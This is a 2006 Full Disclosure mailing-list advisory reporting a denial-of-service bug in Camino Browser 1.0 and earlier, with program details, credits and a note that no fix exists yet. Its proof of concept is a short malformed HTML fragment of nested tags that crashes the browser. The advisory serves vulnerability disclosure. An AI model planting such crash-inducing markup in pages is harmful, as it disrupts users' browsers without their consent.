Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Camino Browser HTML Parsing Null Pointer Dereference Denial of Service Vulnerability

From: izi <easy.mask () gmail com>
Date: Fri, 14 Apr 2006 12:48:52 +0200
//----- Advisory


Program          : Camino Browser
Homepage         : http://www.caminobrowser.org
Tested version   : <= 1.0
Found by         : Simon MOREL <philemon at thehackademy dot net>
This advisory    : Simon MOREL <philemon at thehackademy dot net>
Discovery date   : 2006/04/13

//----- Application description


The Camino Project has worked to create a browser that is as functional and
elegant as the computers it runs on.
The Camino web browser is powerful and ready to meet the needs of all users
while remaining simple and elegant in its design..


//----- Description of vulnerability

Camino Browser is prone to a denial-of-service condition when parsing
certain malformed HTML content.


//----- Proof Of Concept


<legend>
<kbd>
<object>
<h4>
</object>
</kbd>



//----- Solution


Not Yet.


//----- Impact


Successful exploitation will cause the browser to crash.


//----- Credits


Simon MOREL <philemon at thehackademy dot net>
http://www.sysdream.com


//----- Greetings


Thomas Waldegger <bugtraq at morph3us dot org>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: